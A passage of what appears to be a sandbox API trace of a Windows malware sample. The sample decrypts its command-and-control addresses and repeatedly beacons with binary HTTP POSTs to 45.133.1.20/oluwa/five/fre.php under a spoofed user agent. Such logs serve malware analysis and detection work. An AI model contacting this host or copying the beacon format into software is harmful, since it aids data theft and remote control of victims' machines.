(lpLibFileName="ADVAPI32") returned 0x74810000 [0168.410] CryptImportKey (in: hProv=0x6bf278, pbData=0x6ba028, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0168.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.411] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0168.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.412] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0168.412] GetProcessHeap () returned 0x6a0000 [0168.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba028 | out: hHeap=0x6a0000) returned 1 [0168.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.414] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0168.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.417] CryptDestroyKey (hKey=0x6ad020) returned 1 [0168.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.417] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0168.417] GetProcessHeap () returned 0x6a0000 [0168.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0168.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.418] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0168.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.419] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0168.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.420] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0168.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.421] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0168.421] GetProcessHeap () returned 0x6a0000 [0168.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0168.421] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0168.421] GetProcessHeap () returned 0x6a0000 [0168.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0168.422] GetProcessHeap () returned 0x6a0000 [0168.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0168.422] GetProcessHeap () returned 0x6a0000 [0168.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0168.422] GetProcessHeap () returned 0x6a0000 [0168.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0168.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.423] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0168.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.431] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0168.442] GetProcessHeap () returned 0x6a0000 [0168.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0168.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.444] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0168.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.445] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0168.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.446] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0168.446] GetProcessHeap () returned 0x6a0000 [0168.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0168.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.452] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0168.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.453] CryptDestroyKey (hKey=0x6ad020) returned 1 [0168.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.455] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0168.455] GetProcessHeap () returned 0x6a0000 [0168.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0168.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.456] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0168.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.457] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0168.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.461] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0168.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.463] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0168.463] GetProcessHeap () returned 0x6a0000 [0168.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0168.463] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ba090*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be958*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0168.463] GetProcessHeap () returned 0x6a0000 [0168.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0168.463] socket (af=2, type=1, protocol=6) returned 0x328 [0168.463] connect (s=0x328, name=0x6be958*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0168.490] FreeAddrInfoW (pAddrInfo=0x6ba090*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be958*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0168.490] GetProcessHeap () returned 0x6a0000 [0168.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0168.490] GetProcessHeap () returned 0x6a0000 [0168.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0168.494] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0168.496] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0168.496] GetProcessHeap () returned 0x6a0000 [0168.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0168.496] GetProcessHeap () returned 0x6a0000 [0168.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0168.497] GetProcessHeap () returned 0x6a0000 [0168.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0168.497] GetProcessHeap () returned 0x6a0000 [0168.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0168.498] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0168.499] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0168.499] GetProcessHeap () returned 0x6a0000 [0168.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0168.499] GetProcessHeap () returned 0x6a0000 [0168.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0168.499] send (s=0x328, buf=0x6bbd20*, len=242, flags=0) returned 242 [0168.500] send (s=0x328, buf=0x6bb998*, len=159, flags=0) returned 159 [0168.501] GetProcessHeap () returned 0x6a0000 [0168.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0168.501] recv (in: s=0x328, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0168.602] GetProcessHeap () returned 0x6a0000 [0168.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0168.602] GetProcessHeap () returned 0x6a0000 [0168.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0168.603] GetProcessHeap () returned 0x6a0000 [0168.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0168.603] GetProcessHeap () returned 0x6a0000 [0168.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0168.603] closesocket (s=0x328) returned 0 [0168.605] GetProcessHeap () returned 0x6a0000 [0168.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0168.605] GetProcessHeap () returned 0x6a0000 [0168.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0168.605] GetProcessHeap () returned 0x6a0000 [0168.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0168.606] GetProcessHeap () returned 0x6a0000 [0168.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0168.607] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc7c) returned 0x328 [0168.609] Sleep (dwMilliseconds=0xea60) [0168.610] GetProcessHeap () returned 0x6a0000 [0168.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0168.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.611] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0168.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.620] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0168.629] GetProcessHeap () returned 0x6a0000 [0168.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0168.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.630] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0168.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.631] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0168.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.675] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0168.675] GetProcessHeap () returned 0x6a0000 [0168.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0168.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.677] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0168.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.678] CryptDestroyKey (hKey=0x6ad020) returned 1 [0168.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.679] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0168.679] GetProcessHeap () returned 0x6a0000 [0168.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0168.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.680] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0168.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.681] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0168.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.682] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0168.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.683] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0168.683] GetProcessHeap () returned 0x6a0000 [0168.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0168.684] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0168.684] GetProcessHeap () returned 0x6a0000 [0168.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0168.685] GetProcessHeap () returned 0x6a0000 [0168.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0168.686] GetProcessHeap () returned 0x6a0000 [0168.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0168.687] GetProcessHeap () returned 0x6a0000 [0168.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0168.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.689] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0168.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.694] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0168.706] GetProcessHeap () returned 0x6a0000 [0168.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0168.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.708] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0168.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.710] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0168.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.711] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0168.712] GetProcessHeap () returned 0x6a0000 [0168.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0168.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.713] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0168.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.714] CryptDestroyKey (hKey=0x6ad020) returned 1 [0168.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.715] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0168.715] GetProcessHeap () returned 0x6a0000 [0168.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0168.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.716] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0168.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.717] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0168.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.718] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0168.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.719] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0168.719] GetProcessHeap () returned 0x6a0000 [0168.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0168.720] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9938*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be898*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0168.720] GetProcessHeap () returned 0x6a0000 [0168.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0168.720] socket (af=2, type=1, protocol=6) returned 0x32c [0168.721] connect (s=0x32c, name=0x6be898*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0168.750] FreeAddrInfoW (pAddrInfo=0x6b9938*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be898*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0168.750] GetProcessHeap () returned 0x6a0000 [0168.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0168.750] GetProcessHeap () returned 0x6a0000 [0168.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0168.751] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0168.753] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0168.753] GetProcessHeap () returned 0x6a0000 [0168.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0168.753] GetProcessHeap () returned 0x6a0000 [0168.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0168.754] GetProcessHeap () returned 0x6a0000 [0168.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0168.754] GetProcessHeap () returned 0x6a0000 [0168.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0168.754] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0168.755] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0168.755] GetProcessHeap () returned 0x6a0000 [0168.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0168.755] GetProcessHeap () returned 0x6a0000 [0168.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0168.756] send (s=0x32c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0168.756] send (s=0x32c, buf=0x6bb998*, len=159, flags=0) returned 159 [0168.756] GetProcessHeap () returned 0x6a0000 [0168.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0168.757] recv (in: s=0x32c, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0168.826] GetProcessHeap () returned 0x6a0000 [0168.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0168.826] GetProcessHeap () returned 0x6a0000 [0168.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0168.827] GetProcessHeap () returned 0x6a0000 [0168.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0168.827] GetProcessHeap () returned 0x6a0000 [0168.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0168.848] closesocket (s=0x32c) returned 0 [0168.849] GetProcessHeap () returned 0x6a0000 [0168.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0168.849] GetProcessHeap () returned 0x6a0000 [0168.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0168.849] GetProcessHeap () returned 0x6a0000 [0168.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0168.850] GetProcessHeap () returned 0x6a0000 [0168.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0168.850] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x644) returned 0x32c [0168.852] Sleep (dwMilliseconds=0xea60) [0168.854] GetProcessHeap () returned 0x6a0000 [0168.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0168.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.855] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0168.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.865] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0168.876] GetProcessHeap () returned 0x6a0000 [0168.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0168.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.878] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0168.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.879] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0168.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.880] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0168.880] GetProcessHeap () returned 0x6a0000 [0168.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0168.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.882] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, 